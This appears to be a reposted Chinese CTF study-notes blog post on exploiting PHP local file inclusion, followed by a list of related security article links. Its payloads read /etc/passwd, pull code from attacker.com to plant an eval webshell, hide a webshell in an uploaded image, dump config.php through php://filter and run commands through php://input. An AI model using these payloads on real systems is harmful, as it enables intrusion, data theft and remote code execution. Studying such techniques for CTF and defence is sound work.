ctf学习笔记[转载]

最新推荐文章于 2024-07-30 09:36:23 发布
最新推荐文章于 2024-07-30 09:36:23 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 学习笔记

本地文件包含的利用技巧\
1.读取敏感文件
访问URL:http://www.xxser.com/index.php?page=/etc/passwd
如果目标主机文件存在,并且有相应的权限,那么就可以读出文件的内容。反之,就会得到一个类似于;open_basedir restriction in effect的警告。\
2.远程包含Shell
如果目标主机allow_url_fopen选项是激活的,就可以尝试远程包含一句话木马,如:http://www.attacker.com/echo.txt,代码如下:\

    <?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>\

访问:http://www.example.com/index.php?page=http://www.attacker.com/echo.txt。将会在index.php所在的目录下生成shell.php,内容为:

<?php eval($_POST[xxser]);?>

3.本地包含配合文件上传
假设已经上传一句话图片木马到服务器,路径为:/uploadfile/xxx.jpg
图片代码如下:

    <?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>

访问URL:http://www.example.com/index.php?page=./uploadfile/xxx.jpg,包含这张图片,将会在index.php所在的目录下生成shell.php。\

4.使用PHP封装协议

4.1 使用封装协议读取PHP文件
例子如下:

http://www.example.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php

访问URL,得到经过Base64加密后的字符串,这段代码就是Base64加密过后的PHP源代码,解密后就可得到原本的“样貌”。

4.2 写入PHP文件
在allow_url_include为On时,构造URL:

http://www.example.com/index.php?page=php://input,并且提交数据为:<?php system('net user');?>

会得到net user命令的结果。\

5.包含Apache日志文件
本地文件包含的利用。
Apache有两个日志文件:access.log(访问日志)和error.log(错误日志)。
攻击者先访问http://www.example.com/

Soldier915
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
杨秀璋的专栏
11-01 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。这篇文章换个口味,将分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。
CTF 讲解PPT
12-27
CTF培训PPT 方便CTF新手对ctf有一个充足的了解
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
m0_59162248的博客
11-13 5052
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
CTF学习笔记汇总(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-30 624
protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见,也就不能输出。因此保护类的变量在序列化时,前面会加上\0*\0的前缀。因为是强类型比较,用0e开头的字符串是没办法绕过的了,但是PHP自身的特性使得可以提交一个数组,而md5函数传入数组的返回值都是NULL,这样就可以绕过强类型比较了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CTF培训学习笔记—SSRF
Z745526156的博客
11-03 518
SSRF漏洞 SSRF,Server-Side Request Forgery,服务端请求伪造,是一种由攻击者构造形成由 服务器端发起请求的一个漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问 的内部系统。 漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没 有对目标地址作过滤和限制。 攻击途径 攻击者可以利用 SSRF 实现的攻击主要有 5 种: 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的 banner 信息 2.攻击运行在内网或本地的应用程序(比如溢出)
ctf学习笔记
qq_27396789的博客
11-13 1661
生病赋闲在家,看点ctf
ctf
芥子
01-17 1078
题目:robot解题链接:http://106.75.86.18:1111/这一题的题目为robot,想到网站一般都有一个robots.txt访问:http://106.75.86.18:1111/robots.txt访问robots.txt目录下的目录发现都没有权限想到通过burp suite抓包但是无论怎样抓包放包,都没有结果显示后来我直接复制robots.txt页面的目录:http://10
CTF学习(一)
学习记录
02-28 268
一、HTTP协议 1.1请求方式 ①复制题目链接至火狐,利用burp抓包 ②点击右键选择send to Repeater,将GET改为CTFHUB,点击GO得旗 1.2 302跳转 ①复制题目链接至火狐,点击Give me Flag链接后利用burp抓包 ② 点击右键选择send to Repeater,点击GO得旗 1.3 Cookie ①复制题目链接至火狐,利用burp抓包 ② 点击右键选择send to Repeater,将Cookie:admin=0改成Cookie:admin=1
网络安全与CTF学习信息汇总
墙角睡大觉的专栏
07-11 3038
http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍)http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0**********************************************************综合学习平台:http://edu.gooann.com/ 谷安...
MATLAB学习笔记
mi19970326的博客
09-24 280
MATLAB学习笔记一:常用的快捷键 1、ctrl+R:注释命令行 2、ctrl+T:取消注释行 3、ctrl+I:程序自动调整为M文件格式 4、ctrl+D:打开m文件中变量和函数 5、ctrl+C:终止函数的运行 6、whos:查看变量 7、clear:清空变量 8、clc:清屏 9、F5:程序运行 10、F9:选中命令运行 11、ctrl+ENTER:光标所在位置程序运行 12、doc +函数名:会得到该函数详细的讲解 13、Tic…Toc :测试程序运行时间 14、figure,hold:figur
2021-06-12LKWA靶场(搭建+转载他人笔记的链接)
qq_45290991的博客
06-12 607
一、环境搭建 国内很难搞了,但是幸好有大神area39大佬!docker-hub上的。。 docker pull area39/lkwa:latest docker run -d -p 3000:80 area39/lkwa:latest 拉取之后镜像存在这个位置: docker images查镜像(这里我多下了一个): 结果发现不行,kali无法访问lkwa所映射的3000端口……,查了很多资料,最后按照这篇文章的排查方法发现是重启可以解决:解决Docker端口映射无法访问问题 背后
CTF工具之秋式日志分析器(misc).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
web服务器的访问日志access.log
04-15
web服务器的访问日志,可方便没有web服务器的学习使用
bugku.welcome to the bugkuctf
qq_44598397的博客
09-25 310
这里记录我花了一整天才理清题目意思的题目,因为接触CTF时间还不长,水平还停留在各个方面都稍有了解,但是涉及的知识稍微深入一些就没有思路了,这道题目涉及了php的代码审计,php的伪协议,php的序列化,php魔术方法。 因为我是小白一个,所以这道题目稍微把一些细节的地方说多一点,万一有些朋友看到其他writeup没看懂,看到我说的一些地方有可能就懂了。。。。 首先打开题目查看源代码以后: 从上...
网站服务器记录攻击日志ctf,通过网站日志分析sql注入攻击的痕迹
weixin_28805935的博客
08-05 2890
一次偶然的机会,我的朋友给我发了一个日志文件,让我看一下服务器access.log文件,说是CTF的题目,给了它这样一个access文件,随后要了flag。因为我是专业划水的,CTF基本上不碰它,我也不知道怎么做,所以我试着分析了一下下。打开网站日志文件。文件里的内容基本都很长。浏览完日志文件,发现CTF这么直接,没有干扰流量,整个文件只有一个访客。因此,不需要找到攻击者的地址。在实际的安全事件分...
CTF Web方向考点总结
qq_41513009的博客
09-20 1万+
ctf web考点总结
CTF之misc-日志分析
热门推荐
Battery的博客
05-04 14万+
1、注入审计 出题人通常会使用sqlmap去跑一个注入点,跑出数据后将日志留存,让参 赛者判断sqlmap注出了什么数据,此数据通常就为flag。 2、命令执行审计 出题人通常会利用一句话木马,进行一系列敏感操作,或者假装一开始不知 道一句话木马的密码,从而进行一系列的爆破行为,让参赛者判断一句话木 马的密码。 ......
ctf 一题日志审计题
为之的博客
07-16 5007
打开日志看下,前面看不出什么,但是最后面就很明显,url解码后是sq盲注 这是按照一般流程去盲注找出数据库、表、字段及它们的长度。 所以直接跳过 直到这附近, 随便打开一个解码 3' OR NOT ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM flag.flag),1,1))>48# 这是对flag的每个字符判断其ascii值,本来应该是通过响应状态码来判断是否成功,但是所有的状态码200,但是 ...
青少年ctf-日志分析
Cfoxer的博客
08-03 905
题目描述:安全工程师拿到一个日志,里面有一条上传木马的记录,找到那个上传黑客的ip(某网站被上传了木马,找出上传木马黑客的ip,上传文件所在文件夹为uploads),flag格式为:ip地址。但是这个会出现贼多记录,进一步想法,既然上传木马,那就从后缀入手,那就浅浅试两个php和jsp。思路:首先文件上传,那么状态码一定是200,并且要是包含文件夹uploads。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值